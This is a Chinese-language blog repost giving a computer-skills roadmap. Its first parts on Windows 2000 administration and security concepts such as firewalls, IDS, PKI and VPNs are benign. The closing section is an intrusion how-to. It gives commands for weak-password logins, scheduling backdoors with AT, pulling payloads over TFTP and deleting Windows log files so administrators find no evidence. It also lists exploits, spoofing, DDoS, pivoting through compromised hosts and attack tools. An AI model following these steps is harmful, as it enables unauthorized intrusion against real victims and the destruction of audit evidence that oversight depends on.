***必須要掌握的計算機知識***必須要掌握哪些計算機知識？ 基礎： 如何去學習 ·要有學習目標 ·要有學習計劃 ·要有正確的心態 ·有很強的自學能力 學習目標 ·1.明確自己的發展方向(你現在或者將來要做什么,程序員?安全專家?網絡***等) ·2.自己目前的水平和能力有多高 ·能簡單操作windows2000 ·能簡單配置windows2000的一些服務 ·能熟練的配置Windows2000的各種服務 ·能熟練配置win2000和各種網絡設備聯網 ·能簡單操作Linux,Unix,Hp-unix, Solaris中的一種或者多種操作系統 ·能配置cicso,huawei,3com,朗迅等網絡設備 ·會簡單編寫C/C++,Delphi,Java,PB,VB,Perl ·能簡單編寫Asp,Php,Cgi和script,shell腳本 ·3.必須學會不相信態度,尊重各種各樣的能力 ·不要為那些裝模做樣的人浪費時間 ·尊重別人的能力, ·會享受提高自己能力的樂趣. ·在知道了自己的水平和能力之后就要開始自己的目標了 ·--------安全專家 ·--------*** ·--------高級程序員 ·***是建設網絡,不是破壞網絡, 破壞者是駭客; ·***有***的技術,但是他們是維護網絡的,所以和安全專家是差不多的; ·因為懂得如何***才知道如何維護 ·因為懂得如何維護才更要了解如何*** ·這是 ***與安全專家的聯系 ·但,他們都是在會編程的基礎上成長的! ·下面我們開始我們的學習計劃! 學習計劃 有了學習計劃才能更有效的學習 安全學習計劃 不奢求對win98有多么精通,我們也不講解win98如何應用,如何精通,我們的起步是win2000 s erver,這是我們培訓的最低標準,你對英語有一定的了解也是必不可少 最基礎 ·a.會裝win2000,知道在安裝的時候有兩種分區格式,NTFS與FAT32 及他們的區別,知道win2 000可以在安裝的時候分區,格式化硬盤, 可以定制安裝,可以定制自己需要安裝的一些組件 ,如果有網絡適配器,可以直接加入域中 學習點:NTFS和FAT32分區的不同 各個組件的作用 域的定義 ·b.知道如何開,關機 知道注銷的用處 ·c.知道win2000下面各主要目錄的作用 Documents and Settings,WINNT,system32 Progra m Files ·d.知道管理工具里面各個組件的定義 ·e.學會應用命令提示符cmd(dos) ·f.知道計算機管理里面的各個選項的不通 ·g.知道win2000強大的網絡管理功能 ·h.能非常熟練的操作win2000 ·i.知道IP地址,子網掩碼,網關和MAC的區別 進階 ·A.配置IIS,知道各個選項的作用 ·B.配置DNS,DHCP ·C.配置主控制域,輔助域 ·D.配置DFS ·E.配置路由和遠程訪問 ·F.配置安全策略IPSEC ·G.配置service(服務) ·H.配置磁盤管理,磁盤分額 ·i. 配置RAID(0,1,0+1,5) ·J.路由器的安裝與簡單配置 ·K.交換機的安裝與簡單配置 ·L.常見的×××,VLAN,NAT配置 ·M.配置常見的企業級防火墻 ·N.配置常見的企業級防病毒軟件 高級 ·之前我們學到的是任何一個想成為網絡安全專家和***基本知識中的一部分 ·你作到了嗎?? ·如果你做到了,足以找到一份很不錯的工作! 配置負載均衡 ·配置WIN2000+IIS+EXCHANGE+MSSQL+SERVER-U+負載均衡+ASP(PHP.CGI)+CHECK PIONT(ISA SERVER) · ·配置三層交換網絡 · ·配置各種復雜的網絡環境 ·能策劃一個非常完整的網絡方案 · ·能獨自組建一個大型的企業級網絡 · ·能迅速解決網絡中出現的各種疑難問題 結束 ·在你上面的都學好了,你已經是一個高級人才了,也是我們VIP培訓的目標! ·可以找到一份非常好的工作 ·不會再因為給女朋友買不起玫瑰而發愁了! 安全： 導讀 ·系統安全服務(SYSTEM) ·防火墻系統(FIREWALL) ·***檢測(IDS) ·身份驗證(CA) ·網站監控和恢復(WEBSITE) ·安全電子商務(E-BUSINESS) ·安全電子郵件(E-MAIL) ·安全辦公自動化(OA) ·Internet訪問和監控(A&C) ·病毒防范(VIRUS) ·虛擬局域網(×××) 系統安全服務 ·系統安全管理 ·系統安全評估 ·系統安全加固 ·系統安全維護 ·安全技能學習 系統安全管理 ·信息系統安全策略 ·信息系統管理員安全手冊 ·信息系統用戶安全手冊 ·緊急事件處理流程 系統安全評估 1、系統整體安全分析 · 分析用戶的網絡拓撲結構，以找出其結構性及網絡 配置上存在的安全隱患。 · 通過考察用戶信息設備的放置場地，以使得設備物理上是安全的。 · 分析用戶信息系統的管理、使用流程，以使得系統 能夠安全地管理、安全地使用 2、主機系統安全檢測 · 通過對主機進行安全掃描，以發現系統的常見的安全漏洞。 · 對于特定的系統，采用特別的工具進行安全掃描。 · 根據經驗，對系統存在的漏洞進行綜合分析。 · 給出系統安全漏洞報告。 · 指出各個安全漏洞產生的原因以及會造成的危險。 · 給出修復安全漏洞的建議 3、網絡設備安全檢測 · 通過對網絡進行安全掃描，以發現網絡設備的安全漏洞。 · 根據經驗，對網絡設備存在的漏洞進行綜合析。 · 給出網絡設備安全漏洞報告。 · 指出各個安全漏洞產生的原因以及會造成的險。 · 給出修復安全漏洞的建議。 安全系統加固 ·為用戶系統打最新安全補丁程序。 ·為用戶修復系統、網絡中的安全漏洞。 ·為用戶去掉不必要的服務和應用系統。 ·為用戶系統設置用戶權限訪問策略。 ·為用戶系統設置文件和目錄訪問策略。 ·針對用戶系統應用進行相應的安全處理。 安全系統維護 ·防火墻系統維護，安全日志分析 ·IDS系統維護，安全日志分析 ·×××系統維護，安全日志分析 ·認證系統維護，安全日志分析 ·服務器、主機系統，安全日志分析 ·其它各類安全設施維護及日志分析 安全技能培訓 ·網絡安全基礎知識 ·網絡***手段演示和防范措施 ·防火墻的原理和使用 ·×××的原理和使用 ·漏洞掃描工具的原理和使用 ·IDS（***檢測系統）的原理和使用 ·身份認證系統的原理和使用 ·防病毒產品的原理和使用 ·系統管理員安全培訓 ·一般用戶安全培訓 防火墻系統 ·防火墻的定義 ·防火墻的分類 ·包過濾防火墻 ·應用網關防火墻 ·狀態檢測防火墻 ·一般企業防火墻配置 ·政府機構防火墻配置 ·涉密網絡保密網關配置 ·高可用性和負載均衡防火墻系統 ·高速防火墻系統 防火墻的定義 ·用以連接不同信任級別網絡的設備。 ·用來根據制定的安全規則對網絡間的通信進行控制 防火墻的分類 ·包過濾 (Packet Filters) ·應用網關 (Application Gateways) ·狀態檢測(Stateful Inspection) 包過濾防火墻 ·包 過 濾 技 術 ·主要在路由器上實現，根據用戶定義的內容（如IP地址、端口號）進行過濾。包過濾在網 絡層進行包檢查與應用無關。 · 優 點 · 具有良好的性能和可伸縮性。 · 缺點 · 由于包過濾技術是對應用不敏感的，無法理解特定通訊的含義，因而安全性很差。 應用網關防火墻 ·應用網關技術 ·第二代防火墻技術，其在應用的檢查方面有了較大的改進,能監測所有應用層，同時對應 用“內容”（Content Information）的含義引入到了防火墻策略的決策處理。 · 優點 · 安全性比較高。 · 缺點 · 1、該方法對每一個請求都必須建立兩個連接，一個從客戶端到防火墻系統，另一個從 防火墻系統到服務器，這會嚴重影響性能。 · 2、防火墻網關暴露在***者之中。 · 3、對每一個代理需要有一個獨立的應用進程或 daemon 來處理， 這樣擴展性和支持 新應用方面存在問題。 檢測狀態防火墻 · 屬第三代防火墻技術，克服了以上兩種方法的缺點，引入了OSI全七層監測能力，同時 又能保持 Client/Server的體系結構，也即對用戶訪問是透明的。 · 防火墻能保護、限制其他用戶對防火墻網關本身的訪問。 · 狀態檢測技術在網絡層截獲數據包后交給INSPECT Engine,通過 INSPECT Engine 可以 從數據包中抽取安全決策所需的所有源于應用層中的狀態相關信息，并在動態狀態表中 維 持這些信息以提供后繼連接的可能性預測。該方法能提供高安全性、高性能和擴展性、高伸 縮性的解決方案。 ***檢測系統 ·處理***時遇到的典型問題 ·解決***的方法和手段 ·基于網絡的***檢測 ·基于主機的***檢測 ·***檢測系統典型配置 處理***時遇到的問題 ·獲得的信息不足 ·不知到網絡上發生了什么事。 ·無法判定系統是否已經被***。 ·信息不準確 ·人員少 ·沒有足夠的人員維護管理。 ·缺乏規范的處理程序 ·發現***時如何反應? ·下一步該如何處理? 解決***的方法和手段 ·采用***實時***監控系統（IDS） ·對系統、網絡中發生的事件進行實時監控。 ·當發生***事件時能即時反應。 ·對***事件進行詳細記錄并跟蹤。 基于主機的***檢測 ·軟件模塊安裝在包含有重要數據的主機上 ·監視操作系統的日志以發現***的特征。 ·監視代理所處主機上的所有進程和用戶. ·監視暴力登錄***（brute-force login）, 試圖改變或繞過安全設定，及特權的濫用等 。 ·當新的日志產生時，為了減小對CPU的影響，代理程序暫時中斷。 基于網絡的***檢測 ·軟件安裝在專門的主機上，放置于關鍵的網段 ·將配置該軟件主機的網卡設置為混雜模式，使得該主機能接受網段上所有的包。 ·分析數據包以判斷是否有******。 ·監視網段上的所有數據。 ·對網絡的流量無任何影響。 ·能檢測到 denial of service attacks, unauthorized access attempts, pre-attack s cans等***。 身份認證系統 ·用戶身份認證的方法 ·不同認證方法的安全級別 ·用戶身份認證的常用方式 ·解決問題的方法 ·目前比較成熟的雙因素認證方法 用戶身份驗證 ·你知道的一些東西 · 密碼, ×××號，生日 ·你有的一些東西 · 磁卡, 智能卡,令牌, 鑰匙 ·你獨有的一些東西 · 指紋,聲音，視網膜 密碼是不安全的 ·可以破解密碼的工具太多 ·大多密碼在網絡中是明文傳輸的 ·密碼可以網絡離線時被窺測 ·密碼和文件從PC和服務器上被轉移了 ·好記的密碼容易被猜到,不易猜測的密碼又太難記 解決方法 ·使用混合的工具:如IC卡+PIN 網站監控與恢復系統 ·典型的Web服務器應用 ·Web服務器存在的安全問題 ·網站安全解決方法 典型web服務器應用 ·Internet-->路由器-->防火墻-->web站點 · | · | · 內部網 ·所有的放在防火墻后面 Web服務器存在的安全問題 · 網頁被非法篡改是網站內容提供者最頭痛的問題。在采用防火墻后，Web服務器本身的漏 洞成為了網站被黑的主要問題。 · Web應用服務器(如IIS,Apache中存在著大量的安 全漏洞.) · 用戶自己開發的CGI、ASP、PHP應用中存在著大量潛在的漏洞。 網站安全 ·采用Web服務器監控與恢復系統 ·該系統提供對網站文件內容的實時監控，發現被改動后立即報警并自動恢復。 電子商務安全系統 ·典型的電子商務應用 ·電子商務中存在的安全問題 ·電子商務的安全解決方法 ·實時數據交換系統 典型電子商務應用 ·Internet--->防火墻--->Web服務器 · || | · || | · 內部網(數據庫) 電子商務中存在的安全問題 ·1、Web服務器端 ·Web應用服務器（如IIS、Apache中存在著大量的安全漏洞。用戶自己開發的CGI、ASP、PH P應用中存在著潛在的漏洞。 · ***通過這些漏洞***Web服務器，可非法篡改網頁，造成惡劣影響，動搖了電子商務使 用者的信心。 · 甚至可獲得Web服務器上大量的敏感資料，如用戶的信用卡號，用以連接內部數據庫的帳 號和口令。 · 可能通過控制Web服務器，來***內部數據庫。 電子商務中存在的安全問題 ·2、SSL協議 ·SSL加密強度低。由于瀏覽器默認的加密模塊只支持40位的低強度加密，而且即使在瀏覽 器中安裝更高位的加密模塊，由于WEB服務器不提供對高位SSL鏈接的支持同樣無法實現高強 度SSL加密鏈接。 · 無法解決電子商務中的用戶簽名。SSL鏈接建立WEB服務器和用戶瀏覽器之間的安全通道 只能保證在安全通道內的信息不被竊聽或篡改，并不能對用戶發送的信息進行簽名以保證信 息的有效性和不可抵賴性，而這正是電子商務中必須解決的問題。 電子商務的安全解決方法 ·將WEB服務器分為兩部分：一般內容的WEB服務器和交易WEB服務器。 · 一般內容的WEB服務器放置在DMZ區內，采用WEB站點監控和恢復系統保護，防止主頁被非 法改動。 · 交易WEB服務器放置在內部網內，通過一臺物理分隔的實時數據交換系統將其與DMZ區相 連。 · 在客戶機和服務器端安裝SSL代理，從而獲得128位的高強度加密通道 實時數據交換系統 ·將系統外部 Web服務器和內部應用Web服務器物理隔開. ·外部Web服務器用于存放一般的信息，內部Web服 務器用于存放敏感信息，并和內部數據 庫連接。 ·外部用戶通過http訪問位于DMZ區內的一般Web服務器。 ·當進行交易時，用戶需訪問位于內部網內的應用服務器。 ·https連接首先到達實時數據交換系統的虛擬外部Web服務器，實時數據交換系統將https 協議解開，只將https連接的數據內容拷貝到虛擬內部Web服務器，虛擬內部Web服務器將使 用該數據重新發起https連接到實際的內部應用Web服務器. ·內外通過實時數據交換系統進行數據交換，無任何協議和連接穿過實時數據交換系統。 ·即使DMZ區的Web服務器受到***, ***者也的不到任何有用的信息 安全電子郵件系統 ·電子郵件的安全問題 ·安全電子郵件的解決方法 ·一個安全郵件的使用過程 電子郵件的安全問題 ·如何保證發送的敏感信息不被泄漏 ·如何保證發送的信息不被篡改 ·如何確認發件人的真實身份 ·如何防止發件人的抵賴行為 安全電子郵件的解決方法 ·將PKI體系應用到郵件系統中 ·郵件的加密和解密以實現數據的保密。 ·郵件的數字簽名（鑒別）實現發件人認證和不可抵賴。 ·完整性校驗功能防止信息傳輸過程中被篡改可*的安全性。 ·采用公開密鑰和對稱密鑰相結合的密鑰體系。 ·支持128bit對稱密鑰算法和1024bit公開密鑰算法。 辦公自動化系統的安全問題 · 如何保證發送的敏感信息不被泄漏 · 如何保證發送的信息不被篡改 · 如何確認發件人的真實身份 · 如何防止發件人的抵賴行為 安全辦公自動化系統的解決方法 ·將PKI體系應用到辦公自動化系統中 ·工作流信息的加密和解密以實現數據保密 ·工作流信息的數字簽名（鑒別）實現發件人認證和不可抵賴。 ·完整性校驗功能防止信息傳輸過程中被篡改可*的安全性。 ·采用公開密鑰和對稱密鑰相結合的密鑰體系 ·支持128bit對稱密鑰算法和1024bit公開密鑰算法。 Internet訪問及控制系統 ·Internet使用存在的問題 ·Internet使用的解決方法 ·內容緩存系統 ·Internet站點過濾系統 Internet訪問存在的問題 ·Internet接入帶寬不足，訪問比較慢。 ·大量的用戶訪問相同的內容，造成帶寬的進一步擁擠。 ·在上班時間里大量的Internet訪問是與業務無關的。 ·有人使用公司的Internet系統訪問×××網站。 ·有人使用公司的Internet系統訪問反動站點。 ·管理人員無法知道Internet系統的使用情況。 Internet訪問的解決方法 · 對于問題一，采用內容緩存系統。 · 對于問題二，采用Internet 站點過濾系統。 內容緩存系統 ·1、Client 發起http連接請求 ·2、Proxy 收到請求后將檢查內部緩存內是否有所需內容，若有，則返還給Client。 ·3、若無，則Proxy根據請求向目的服務器發起請求。 ·4、Web服務器將內容返回到Proxy服務器。 ·5、Proxy服務器將得到的內容發回給Client，并在自己的緩存中保存一份。 Internet站點過濾系統 (一) ·1、Client 發起http連接請求 ·2、連接到達防火墻時防火墻將URL送到WebSense Server 檢查。 ·3、WebSense 將審查結果返回到防火墻。 ·4、防火墻根據其策略決定是否讓該連接通過。 Internet站點過濾系統 (二) ·1、Client 發起http連接請求 ·2、Proxy 受到請求后將URL送到WebSense Server檢查。 ·3、Proxy根據返回的結果決定是否接收該連接請求。 病毒防范系統 · 互連網時代對防病毒系統的要求 · 計算機病毒解決方法 · 典型病毒防范系統部署 互聯網時代對防病毒系統的要求 · 由于計算機的聯網使用，使得病毒傳播的途徑大為增多：網絡文件共享、電子郵件、Int ernet文件下載，傳播速度也大為加快。 · 新病毒的出現速度加快，用戶的防病毒軟件的病毒特征碼沒能及時更新。 · 目前已出現了惡意的Java、ActiveX，當使用者瀏覽到包含這些代碼的網頁時，會造成安 全問題。 · 一些來歷不明的電子郵件程序或下載的程序中帶有特洛依***，可能會造成受害者的主 機被他人控制。 計算機病毒解決方法 · 從系統的觀點考慮病毒的防范，在所有病毒傳輸的途徑上均配置防病毒軟件，如客戶端 （Win98、 · Win2000)、文件服務器（NT、Netware）、郵件服務器（Exchange、Lotus Notes）、Internet接入系統（Proxy、Firewall)等。 · 整個病毒防范系統采用集中管理的方式，病毒特征碼統一更新，安全策略集中設定，從 而使得整個網絡系統的病毒特征碼得到快速更新。 · 通過在客戶端的瀏覽器和Proxy、Firewall中嵌入病毒檢查軟件，來防范下在程序中帶有 的病毒和可能的惡意Java、ActiveX等可執行代碼的***。 ×××（虛擬私有網） · 數據加密分類 · 物理線路加密 · 數據鏈路加密 · 網絡層加密—IPSec · 傳輸層加密—SSL 數據加密類型 ·物理層->物理層 物理線路加密 ·數據鏈路層->數據鏈路層 (路由器訪問) ·在數據鏈路層(如PPP）進行加密 L2TP、PPTP、L2F ·網絡層->網絡層(路由器 防火墻 主機) ·在網絡層 （如IP）進行加密 IPSec ·傳輸層->傳輸層 (對TCP進行加密 SSL) ·應用層->應用層(在應用層 (如TCP）進行加密 S/MIME、SET、SSH) 物理線路加密 · DDN 加密機 · 幀中繼加密機 · 異步撥號Modem · ISDN線路密碼機 · ATM加密機 注:傳輸層加密 ·Secure Sockets Layer (SSL) 是一個端到端的Internet 安全協議，通過采用數字證書， 它提供了數據加密、身份認證的功能。SSL建立在傳輸層，它為客戶機和服務器在應用級建 立起一個端到斷的安全會話。 ·SSL代理—128位的高強度加密模塊 結束語·恭喜你: ·學完這些并且可以熟練應用,已經是一個真正的網絡安全專家了! ·希望此時的你旁邊有個溫柔稍有點調皮的女朋友,為這孤獨而寂寞的網絡添加一點跳動的 色彩! ***編： 必須要掌握的幾個命令 ·Net ·netsh ·Ftp ·hostname ·Telenet(nc) ·tracert ·At ·Tftp ·Netstat ·Regedit ·Ping 必須要掌握的幾個協議 ·http ·dns ·ftp ·Pop ·Smtp ·Icmp ·Udp ·tcp 開始 ·掌握了******的方式和手段后,那么學習***就簡單多了! ·因為你掌握了這些,剩余的就是使用工具*** ·熟悉掌握一套自己用的***工具 高級 ·自己編寫專用的***工具 ·自己發現系統漏洞 ******手段 ·收集信息: · 收集要***的目標信息 · IP,域名,端口,漏洞,位置 弱口令 ·在nt\2000\xp\2003中弱口令可以用 ·Net use \ip “password” /user:user ·如果目標機開3389服務,可以直接連接 ·在sql的sa弱口令,可以用sql連接器直接 ·登陸 后門*** ·如果有ipc$共享,可以copy過去***后門 ·用at啟動 ·AT \ip time /INTERACTIVE ·如果可以得到shell,也可以用tftp ·Tftp.exe –i ip get *.* *.* ·然后直接安裝 ·如果有3389,可以自己建一個iis,下載 直接運行 密碼破解 ·遠程破解mysql,mssql,ftp,mail,共享密碼 ·本地破解管理員(administrator)密碼 緩沖溢出 ·可以用緩沖溢出***, ·比如流行的webdev,rdcom模塊漏洞 ·可以直接得到system管理權限 ·緩沖溢出后的一般現象是: ·Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> Web服務漏洞 ·例如: ·Unicode漏洞遍歷磁盤和執行程序 ·二次編碼漏洞遍歷磁盤和執行程序 ·.HTR漏洞查看源代碼 嗅探監聽 ·例如: ·針對web監聽 ·針對mail監聽 ·工具如:sinffer , iris 欺騙*** ·例如: ·運用arp欺騙*** 偽裝欺騙 ·常見的如:mail病毒 ·把一個文件改名字甚至圖標,欺騙對方執行 社會工程學 ·例如: ·QQ聊天誘惑 ·EMAIL信息 ·電話 ·誘惑 拒絕服務 ·例如: ·Dos*** ·Ddos*** 利用跳板 ·利用自己的肉雞作為跳板***別的機器 ·My PC------>跳板(肉雞)--->目標 路由器漏洞 ·如: ·原始密碼 ·程序漏洞 防火墻 ·利用欺騙***防火墻,導致防火墻功能失效 ·利用防火墻的模塊漏洞 unix/linux ·NetWare Linux unix solais Solaris hp-unix Aix 等 ·這些目前先不講解 精通***工具 ·必須有一套自己可以完全掌握的***工具 ·如端口掃描 Nscan,bluescanport ·監聽工具:sinffer iris ·telnet工具:nc ·掃描工具:sss,nmap, LANguard ·后門工具:radmin,winshell ·密碼破解:lc4 ·遠程管理:pcanywhere ·會使用各種經典的***工具 清除日志 ·在你***機器以后,離開的時候,要完全清除 ·自己在那臺機器上留下的痕跡 ·例如清除 ·Del C:\WINNT\system32\LogFiles\*.* ·Del C:\WINNT\system32\*.log ·Del C:\WINNT\system32\*.txt ·Del C:\WINNT\*.log ·Del c:\winnt\*.txt 如果你不清除日志 ·當目標機器的管理員發現你的證據 ·完全可以讓你在大墻內渡過一段日子 *** ·當你完全掌握這些后 ·你就成為了一名小*** 高級 ·編寫自己的***工具 ·發現系統漏洞 高級*** ·目前你足以成為一個高級***了 真正的*** ·精通各種網絡協議 ·精通操作系統 ·精通編程技術 ·精通安全防護 ·不搞破壞 ·挑戰技術難題 結束 ·想學好這些,并不是*別人給你的,而是*自己的努力,自己的自學得到的! ·別人只能指導你,怎么去做,只能告訴方法, ·真正的實施是你自己,經過N*N個日夜努力換來的

轉載于:https://blog.51cto.com/306336942/97652

總結

以上是生活随笔為你收集整理的***必须要掌握的计算机知识的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。